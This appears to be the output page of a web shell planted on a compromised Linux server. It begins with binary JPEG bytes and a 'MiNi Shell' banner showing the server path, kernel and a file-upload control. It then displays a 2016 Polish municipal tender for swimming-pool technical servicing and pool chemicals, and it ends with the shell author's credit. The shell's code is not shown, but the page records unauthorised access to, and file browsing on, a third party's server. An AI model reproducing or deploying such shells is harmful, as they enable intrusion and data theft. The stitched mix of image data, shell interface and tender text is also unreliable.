JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160629/110093-N-2016.html

<p class="kh_header"><b>Kowalewo Pomorskie: Wykonanie obsługi technicznej instalacji technologicznych Centrum Rekreacji i Sportu - Pływalnia wraz z dostawą specjalistycznych środków chemicznych na okres od 01.09.2016 do 31.08.2018 roku.</b><br>
<b>Numer ogłoszenia: 110093 - 2016; data zamieszczenia: 29.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kowalewo Pomorskie , Plac  Wolności 1, 87-410 Kowalewo Pomorskie, woj. kujawsko-pomorskie, tel. 056 6841024, faks 056 6841071.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie obsługi technicznej instalacji technologicznych Centrum Rekreacji i Sportu - Pływalnia wraz z dostawą specjalistycznych środków chemicznych na okres od 01.09.2016 do 31.08.2018 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie obsługi technicznej instalacji technologicznych Centrum Rekreacji i Sportu - PŁYWALNIA wraz z dostawą specjalistycznych środków chemicznych.  
Do zadań Wykonawcy należeć będzie:
1 . Obsługa basenu w systemie 24-godzinnym (wynika z dokumentacji obsługi technologii)
 	1.  Kontrola systemu podgrzewania wody.
	2.  Uzdatnianie chemiczne wody zgodnie z zaleceniami Sanepidu oraz PZH.
	3.  Czyszczenie niecki pływalni  ( środki do czyszczenia obciążają Wykonawcę).
	4.  Dodatkowa szokowa dezynfekcja filtrów min. 2 x w tygodniu.
	5.  Płukanie ekstra filtrów wg wskazanej różnicy ciśnień.
	6.  Kalibracja systemu uzdatniania wody min. 1 x dziennie.
	7.  Obsługa instalacji i urządzeń dezynfekujących stopy ( nogomyje) - 1 x dziennie.
	8.  Obsługa instalacji elektrycznej, zasilającej urządzenia systemu uzdatniania wody 	basenowej ( szafy sterownicze -automatyka basenu sztuk 4, transformatory oświetlenia  	podwodnego, szafy automatyki lamp  UV - 4 sztuki, elektrozawory przy wymiennikach  	ciepła - 4 sztuki, zdalne sterowanie atrakcjami basenowymi- szafy ), w tym wymiana 	żarówek oświetlenia podwodnego.
	9.  Ręczne czyszczenie ścian i linii wody oraz usuwanie zanieczyszczeń nie dających się 	usunąć przy pomocy maszyn.
	10.Badanie właściwości fizykochemicznych i bakteriologicznych zgodnie                                    	z wytycznymi Głównego Inspektoratu Sanitarnego w sprawie wymagań jakości wody                 	oraz warunków  sanitarno-higienicznych na pływalniach.
2. Charakterystyka  liczbowa obiegów basenowych.
Obieg Opis basenu Lustro wody [m2] Głębokość [m] Objętość niecki [m3] Obciążenie max.[os/h] T [°C] Wydajność [m3/h] I Pływacki 25x 12,5 312,5 1,35 - 1,80 492 24 26 139 II Basen rekreacyjny 12,5x8,0 100 0,80-1,1 95 25 30 92 III Brodzik dla dzieci 7,0 x 6,0 42 0,15-0,50 12,4 10 32 32 IV Wanna z hydromasażem okrągła 2,83 6,3 0,4-0,9 1,4 6 34 28 Łącznie baseny 460,8 --- 600,8 65 --- 291
3.Bieżąca obsługa urządzeń
1.  Codzienne badanie parametrów wody min. 4 x dziennie.
2.  Czyszczenie systemów dozujących i sprawdzenie ich funkcjonowania 1 x  w tygodniu. 
3.  Usuwanie ewentualnych usterek w ramach obsługi.
4.  Kalibracja elektrod pomiarowych (sond) pH   2 x w tygodniu.
5.  Kalibracja elektrod pomiarowych (sond) redox 2 x w tygodniu.
6.  Kalibracja elektrod pomiarowych (sond) chloru  2 x  w tygodniu.
4. Stacja kontroli parametrów wody - bieżąca obsługa urządzenia
1.  Kalibracja urządzenia według codziennych pomiarów wody.
2.  Regulacja dopływu wody według zawartości w wodzie chloru związanego.
3.  Codzienna kontrola zawartości chloru w wodzie na pływalni. Wykonawca musi posiadać fotometr elektroniczny z interfejsem.
4.  Regulacja czynnika pH w wodzie.
5.  Kontrola odczytu parametru redox.
6. Wymiana elementów pomiarowych według potrzeb wraz z kalibracją sąd pomiarowych                      wg zużycia.
5. Obsługa technologicznego ciepła wody basenowej
1.  Bieżąca kontrola przepływu na wymiennikach ciepła.
2.  Bieżące czyszczenie i odpowietrzanie układu.
3.  Regulacja temperatury wody wg aktualnych potrzeb oraz na wskazanie Kierownika Centrum 
6. Układ dozowania środków chemicznych
1.  Kontrola pomp dozujących środki chemiczne  min. 4 x dziennie.
2.  Kontrola i czyszczenie zaworów dozujących chemię do układu basenowego  1 x w tygodniu.
3.  Wymiana środków chemicznych w układzie dozującym wg zużycia.
4. Czyszczenie zaworów dozujących pH, CL, koagulant 1 x tydzień.
7. Filtrowanie 
1.  Płukanie filtrów basenowych według potrzeb tj. w zależności od obciążenia basenu  (według wskazań na manometrach).
2.  Usuwanie zanieczyszczeń stałych z sit filtracyjnych pomp obiegowych min. 2 x w tygodniu.
3.  Chlorowanie filtrów 2 x w tygodniu.
8. Lampy UV
1.  Kontrola pracy lamp 3 UV min 4 x dziennie.
2.  Ewentualna wymiana żarnika lamp UV.
9. Zbiornik wyrównawczy oraz zbiornik wód popłucznych
1.  Kontrola dopływu wody do basenu i poziomu wody w zbiornikach wyrównawczych  zgodnie              z wytycznymi Głównego Inspektoratu Sanitarnego w sprawie wymagań jakości wody oraz warunków sanitarno-higienicznych na pływalniach.
2.  Czyszczenie zbiorników wyrównawczych oraz zbiornika wód popłucznych według   możliwości technologicznej /ewentualne  przerwy technologiczne w trakcie  funkcjonowania basenu ( koszty środków chemicznych pokrywa Wykonawca).
10.  Bieżąca kontrola pracy urządzeń wentylacyjnych ( hala basenowa, pomieszczenia techniczne, podbasenie) MENERGA
1.  Falowniki sterujące pracą wentylacji  hali basenowej i pomieszczeń technicznych 1 x  dziennie.
2.  Kontrola pracy szaf sterujących układem nawiewu szatni męskiej i damskiej, hali basenowej, suszarek, nawiewu podbasenia centrali 1 x dziennie.
3.  Kontrola pracy wentylatorów 1 x dziennie.
11. Prowadzenie dokumentacji związanej z obsługą 
1. Prowadzenie dokumentacji zgodnie z wytycznymi Głównego Inspektoratu Sanitarnego                       w  sprawie wymagań jakości  wody oraz warunków sanitarno-higienicznych  na pływalniach
2. Sporządzanie protokołu usterek w przypadku zaistniałych poważnych usterek związanych                    z gwarancją poszczególnych elementów lub też usterek wynikających z bieżącej  eksploatacji basenu, prowadzenie dokumentacji związanej z zawartością chloru związanego w wodzie na pływalni.
3.  Na koniec miesiąca kierownik Centrum otrzyma pisemny raport parametrów wody basenowej            i poszczególnych pomiarów ciśnień, temperatury i twardości wody, w celu udokumentowania prawidłowości funkcjonowania obiektu.
4.  W przypadku niewłaściwej pracy poszczególnych urządzeń kierownik Centrum będzie  powiadamiany pisemnie natychmiastowo o nieprawidłowościach.                                                         5.  Wykonawca zobowiązany jest do codziennego zapisywania w dzienniku wartości: pH, chloru i redox, wskazywanych przez komputer sterujący oraz do prowadzenia księgi rozchodów wody.
12. Czyszczenie niecki basenowej.
1. Odkurzanie niecki basenu, według harmonogramu - min. 4 razy w miesiącu (min. 1 w  tygodniu). Zamawiający zapewnia sprzęt do wykonania usługi.
2. Usuwanie nieczystości z wody basenowej w razie potrzeb. Zamawiający nie zapewnia sprzętu do wykonania usługi.
3. W czasie realizacji przedmiotu zamówienia, raz w roku, należy przewidzieć przerwę technologiczną, po uzgodnieniu z Zamawiającym. Wykonawca musi w tym czasie wyłączyć stację uzdatniania wody, opróżnić niecki, wykonać konserwację instalacji, napełnić niecki wodą                          i uruchomić ponownie instalację uzdatniania wody basenowej
13. Dostawa chemii basenowej
 Minimalny termin ważności substancji (gwarancji ) wymagany przez Zamawiającego wynosi              6 miesięcy i liczony będzie od dnia każdej dostawy chemii basenowej.
Wykonawca zobowiązuje się do sporządzania szczegółowego, miesięcznego wykazu chemii                   i środków użytych do obsługi instalacji uzdatniania wody basenowej.
Wykonawca zobowiązany jest do dostarczania następujących środków  w ilości:
podchloryn sodu - 1000 kg/m-c
korektor pH na bazie kwasu siarkowego o stężeniu 49 - 50 %, zawierający inhibitory przeciwko korozji - 400 kg/m-c
środek do koagulacji wody basenowej na bazie polihydroksychlorku glinu o stężeniu minimum 5 % -  60 l/m-c
preparat do zwalczania glonów, bakterii i grzybów, zawierający minimum 30 % amin czwartorzędowych- 30 l/m-c
Multitabletki chlorowe  - 1 op. 
 Bufory pH, redox - 1 op.
Preparat do obniżania stężenia Cl w wodzie basenowej- 1 op.
Preparat do czyszczenia i konserwacji stali kwasoodpornej - 1 op.
Podana ilość jest wielkością orientacyjną, do dostosowania wyceny zamówienia.
Zamawiający wymaga, by środki chemii basenowej były dostarczane w oryginalnych dla danego produktu opakowaniach, zaopatrzone w karty charakterystyki, znak firmowy i nazwę producenta..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-0, 50.50.00.00-0, 50.72.10.00-0, 24.96.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacje na temat wadium: 5000,00 PLN (słownie :pięć tysięcy złotych 00/100 gr).
       Zamawiający żąda wniesienia wadium przed upływem terminu składania ofert w wysokości
5 000,00 PLN (słownie złotych: pięć tysięcy, 00/100), w pieniądzu na rachunek zamawiającego nr 58 9496 0008 0000 1720 2000 0052 w Banku Spółdzielczym Kowalewo Pomorskie lub                w jednej z poniżej podanych form:
I. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej z  tym, że poręczenie kasy zawsze jest poręczeniem pieniężnym- art.45 ust.6 Ustawy Pzp.
II. gwarancjach bankowych,
III. w gwarancjach ubezpieczeniowych; 
IV. poręczeniach udzielonych przez podmioty; o których mowa w art. 6b ust. 5 pkt 2 ustawy              z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości            (tj. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.)
 Odpowiedni dokument należy dołączyć  do oferty w osobnej kopercie, kopię należy wpiąć do oferty razem z innymi dokumentami. Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego, wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potencjału technicznego Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 
W  zakresie  osób  zdolnych  do  wykonania  zamówienia  Zamawiający  uzna warunek  za  spełniony  jeżeli:
Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia , które będą uczestniczyć             w jego wykonaniu i które posiadają uprawnienia: 
a) Świadectwo kwalifikacyjne E, uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie niższym niż 1 kV;
b) Aktualną książeczkę zdrowia do celów sanitarno - epidemiologicznych, wymaganą przez Sanepid. 
Na potwierdzenie tego warunku Wykonawca zobowiązany jest do przedłożenia wraz z ofertą wykazu osób wraz z oświadczeniami o których  mowa w pkt VI SIWZ.
 Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy   wg reguły: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien potwierdzić posiadanie  polisy lub innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej za szkody wyrządzone w związku
z wykonywaniem usługi objętej przedmiotowym zamówieniem z sumą ubezpieczenia w kwocie
1 000 000,00 PLN.
Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy : wg reguły : spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (np. wspólnicy spółki cywilnej, konsorcja) wymagane jest załączenie do oferty pisemnego umocowania (pełnomocnictwa) stwierdzającego ustanowienie Pełnomocnika (lidera) do reprezentowania ich w przedmiotowym postępowaniu albo do reprezentowania  w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli powyższe uprawnienie wynika z umowy regulującej współpracę tych Wykonawców (np. umowy spółki cywilnej, umowy konsorcjum), do oferty w miejsce pełnomocnictwa można załączyć ten dokument.
2. Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa,
to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie
do podpisania oferty. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
3.  Formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin zapłaty - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kowalewopomorskie.ornet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
w Kowalewie ul. Jana Pawła II 2a, (Pływalnia) - biuro kierownika.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 12:00, miejsce: Urząd Miejski, Plac Wolności 1, 87-410 Kowalewo Pomorskie, Sekretariat (biuro nr 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com